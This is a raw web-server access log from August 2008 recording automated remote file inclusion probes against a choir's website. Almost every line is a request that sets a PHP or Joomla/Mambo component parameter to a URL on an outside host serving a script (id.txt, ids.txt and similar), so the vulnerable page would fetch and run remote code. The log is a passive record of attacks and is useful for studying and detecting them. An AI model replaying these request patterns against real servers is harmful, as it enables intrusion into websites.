61.100.30.4 - - [20/Aug/2008:05:15:31 -0700] "GET //include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.100.30.4 - - [20/Aug/2008:05:15:31 -0700] "GET /logs//include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:15:58 -0700] "GET /logs/access_080805.log//com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
64.22.89.194 - - [20/Aug/2008:05:16:10 -0700] "GET //?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 200 1724 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
62.119.28.109 - - [20/Aug/2008:05:16:13 -0700] "GET //?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 200 1724 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
202.181.210.195 - - [20/Aug/2008:05:16:15 -0700] "GET /logs/access_080811.log//?custompluginfile[]=http://www.wsmarketing.cl/biosonda/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
202.181.210.195 - - [20/Aug/2008:05:16:15 -0700] "GET //?custompluginfile[]=http://www.wsmarketing.cl/biosonda/oye.txt?? HTTP/1.1" 200 1724 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
85.159.91.143 - - [20/Aug/2008:05:16:16 -0700] "GET /logs/access.log//?custompluginfile%5B%5D=http://www.minorleaguesportsfans.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
85.159.91.143 - - [20/Aug/2008:05:16:16 -0700] "GET //?custompluginfile%5B%5D=http://www.minorleaguesportsfans.com/id.txt???? HTTP/1.1" 200 1724 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
85.159.91.143 - - [20/Aug/2008:05:16:16 -0700] "GET /logs//?custompluginfile%5B%5D=http://www.minorleaguesportsfans.com/id.txt???? HTTP/1.1" 200 1658 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
85.159.91.143 - - [20/Aug/2008:05:16:17 -0700] "GET /logs/access.log//?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
85.159.91.143 - - [20/Aug/2008:05:16:17 -0700] "GET /logs/access.log//?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
85.159.91.143 - - [20/Aug/2008:05:16:17 -0700] "GET //?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 200 1724 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
85.159.91.143 - - [20/Aug/2008:05:16:17 -0700] "GET //?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 200 1724 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
85.159.91.143 - - [20/Aug/2008:05:16:17 -0700] "GET /logs//?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 200 1658 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
85.159.91.143 - - [20/Aug/2008:05:16:18 -0700] "GET /logs//?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 200 1658 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
85.159.91.143 - - [20/Aug/2008:05:16:21 -0700] "GET /logs/access_080812.log//?custompluginfile%5B%5D=http://www.minorleaguesportsfans.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
85.159.91.143 - - [20/Aug/2008:05:16:22 -0700] "GET /logs/access_080812.log//?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
85.159.91.143 - - [20/Aug/2008:05:16:23 -0700] "GET /logs/access_080812.log//?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:16:26 -0700] "GET /logs/access_080805.log//com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:16:37 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:16:37 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:16:43 -0700] "GET /logs/access_080805.log//com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:16:44 -0700] "GET /logs/access_080805.log//com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
64.105.33.158 - - [20/Aug/2008:05:16:44 -0700] "GET /logs/access_080814.log//administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
64.105.33.158 - - [20/Aug/2008:05:16:53 -0700] "GET //administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
85.159.91.143 - - [20/Aug/2008:05:16:53 -0700] "GET //?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 200 1724 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
64.105.33.158 - - [20/Aug/2008:05:17:01 -0700] "GET /logs//administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
217.110.54.240 - - [20/Aug/2008:05:17:28 -0700] "GET /logs/access_080812.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
217.110.54.240 - - [20/Aug/2008:05:17:28 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
217.110.54.240 - - [20/Aug/2008:05:17:29 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:17:32 -0700] "GET /logs/access_080805.log//com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:17:33 -0700] "GET /logs/access_080805.log//com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
139.146.145.67 - - [20/Aug/2008:05:18:00 -0700] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://verinet.com.tr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
139.146.145.67 - - [20/Aug/2008:05:18:00 -0700] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://verinet.com.tr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
190.54.62.91 - - [20/Aug/2008:05:18:01 -0700] "GET /logs/access_080730.log//?custompluginfile[]=http://free-stick-fighting.com/images/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
190.54.62.91 - - [20/Aug/2008:05:18:01 -0700] "GET /logs//?custompluginfile[]=http://free-stick-fighting.com/images/raid.txt??? HTTP/1.1" 200 1658 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
190.54.62.91 - - [20/Aug/2008:05:18:02 -0700] "GET //?custompluginfile[]=http://free-stick-fighting.com/images/raid.txt??? HTTP/1.1" 200 1724 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
85.159.91.143 - - [20/Aug/2008:05:18:10 -0700] "GET /logs//?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 200 1658 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
85.159.91.143 - - [20/Aug/2008:05:18:10 -0700] "GET //?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 200 1724 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
85.159.91.143 - - [20/Aug/2008:05:18:11 -0700] "GET /logs//?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 200 1658 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
85.159.91.143 - - [20/Aug/2008:05:18:12 -0700] "GET //?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 200 1724 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
64.105.33.158 - - [20/Aug/2008:05:18:12 -0700] "GET /logs/access_080814.log//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
61.100.30.4 - - [20/Aug/2008:05:18:13 -0700] "GET /logs/access_080810.log//login.php?_SESSION%5Bdocroot_path%5D=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.100.30.4 - - [20/Aug/2008:05:18:14 -0700] "GET //login.php?_SESSION%5Bdocroot_path%5D=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.100.30.4 - - [20/Aug/2008:05:18:14 -0700] "GET /logs//login.php?_SESSION%5Bdocroot_path%5D=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
64.105.33.158 - - [20/Aug/2008:05:18:15 -0700] "GET /logs/access_080814.log//administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
85.159.91.143 - - [20/Aug/2008:05:18:15 -0700] "GET /logs//?custompluginfile%5B%5D=http://www.minorleaguesportsfans.com/id.txt???? HTTP/1.1" 200 1658 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
85.159.91.143 - - [20/Aug/2008:05:18:16 -0700] "GET //?custompluginfile%5B%5D=http://www.minorleaguesportsfans.com/id.txt???? HTTP/1.1" 200 1724 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
190.54.62.91 - - [20/Aug/2008:05:18:19 -0700] "GET /logs/access.log//?custompluginfile[]=http://free-stick-fighting.com/images/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
85.159.91.143 - - [20/Aug/2008:05:18:21 -0700] "GET /logs//?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 200 1658 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
64.105.33.158 - - [20/Aug/2008:05:18:21 -0700] "GET //administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
85.159.91.143 - - [20/Aug/2008:05:18:21 -0700] "GET //?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 200 1724 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
64.105.33.158 - - [20/Aug/2008:05:18:24 -0700] "GET //administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
64.105.33.158 - - [20/Aug/2008:05:18:29 -0700] "GET /logs//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
64.105.33.158 - - [20/Aug/2008:05:18:32 -0700] "GET /logs//administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
70.85.201.66 - - [20/Aug/2008:05:19:08 -0700] "GET /logs/access_080812.log//modules/My_eGallery/index.php?basepath=http://ravennet.co.uk/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.americanboyschoir.com"
70.85.201.66 - - [20/Aug/2008:05:19:08 -0700] "GET //modules/My_eGallery/index.php?basepath=http://ravennet.co.uk/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.americanboyschoir.com"
70.85.201.66 - - [20/Aug/2008:05:19:08 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://ravennet.co.uk/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.americanboyschoir.com"
70.85.201.66 - - [20/Aug/2008:05:19:08 -0700] "GET /logs/access_080807.log//com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://ravennet.co.uk/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.americanboyschoir.com"
70.85.201.66 - - [20/Aug/2008:05:19:09 -0700] "GET //com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://ravennet.co.uk/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.americanboyschoir.com"
70.85.201.66 - - [20/Aug/2008:05:19:09 -0700] "GET /logs//com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://ravennet.co.uk/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.americanboyschoir.com"
62.119.28.109 - - [20/Aug/2008:05:19:15 -0700] "GET /logs//?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 200 1658 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
62.119.28.109 - - [20/Aug/2008:05:19:15 -0700] "GET //?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 200 1724 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
62.119.28.109 - - [20/Aug/2008:05:19:21 -0700] "GET /logs//?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 200 1658 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
62.119.28.109 - - [20/Aug/2008:05:19:21 -0700] "GET //?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 200 1724 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
64.105.33.158 - - [20/Aug/2008:05:19:45 -0700] "GET /logs/access_080814.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
64.105.33.158 - - [20/Aug/2008:05:19:53 -0700] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
70.85.201.66 - - [20/Aug/2008:05:20:00 -0700] "GET /logs/access_080811.log//modules/My_eGallery/index.php?basepath=http://ravennet.co.uk/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.americanboyschoir.com"
64.105.33.158 - - [20/Aug/2008:05:20:01 -0700] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
64.105.33.158 - - [20/Aug/2008:05:20:30 -0700] "GET /logs/access_080814.log//administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
64.185.237.191 - - [20/Aug/2008:05:20:33 -0700] "GET /logs/access_080814.log//include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
64.185.237.191 - - [20/Aug/2008:05:20:33 -0700] "GET //include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
64.185.237.191 - - [20/Aug/2008:05:20:34 -0700] "GET /logs/access_080814.log//include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
64.185.237.191 - - [20/Aug/2008:05:20:34 -0700] "GET /logs//include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
64.185.237.191 - - [20/Aug/2008:05:20:34 -0700] "GET //include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
64.185.237.191 - - [20/Aug/2008:05:20:34 -0700] "GET /logs//include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
64.105.33.158 - - [20/Aug/2008:05:20:37 -0700] "GET //administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
64.105.33.158 - - [20/Aug/2008:05:20:45 -0700] "GET /logs//administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
190.54.62.91 - - [20/Aug/2008:05:20:48 -0700] "GET /logs/access_080809.log//?custompluginfile[]=http://free-stick-fighting.com/images/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
67.41.4.26 - - [20/Aug/2008:05:20:59 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.keys.idv.tw/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
67.41.4.26 - - [20/Aug/2008:05:20:59 -0700] "GET //modules/My_eGallery/index.php?basepath=http://www.keys.idv.tw/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:21:57 -0700] "GET /logs/access_080814.log//include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:21:57 -0700] "GET /logs/access_080814.log//include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:21:57 -0700] "GET //include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:21:57 -0700] "GET //include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:21:58 -0700] "GET /logs//include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:21:58 -0700] "GET /logs//include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:21:58 -0700] "GET /logs/access_080814.log//include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:21:58 -0700] "GET //include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:21:59 -0700] "GET /logs//include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:22:00 -0700] "GET /logs/access_080814.log//include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:22:00 -0700] "GET //include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:22:01 -0700] "GET /logs//include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:22:01 -0700] "GET /logs/access_080814.log//include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:22:01 -0700] "GET //include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:22:02 -0700] "GET /logs//include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:22:02 -0700] "GET /logs/access_080814.log//include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:22:02 -0700] "GET //include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:22:03 -0700] "GET /logs//include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:22:05 -0700] "GET /logs/access_080814.log//include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:22:05 -0700] "GET //include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:22:05 -0700] "GET /logs//include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
69.19.225.130 - - [20/Aug/2008:05:22:09 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://acc-advertising.com/img/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.americanboyschoir.com"
69.19.225.130 - - [20/Aug/2008:05:22:09 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://acc-advertising.com/img/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.americanboyschoir.com"
118.129.166.13 - - [20/Aug/2008:05:22:22 -0700] "GET /logs/access_080814.log//include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
118.129.166.13 - - [20/Aug/2008:05:22:23 -0700] "GET //include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
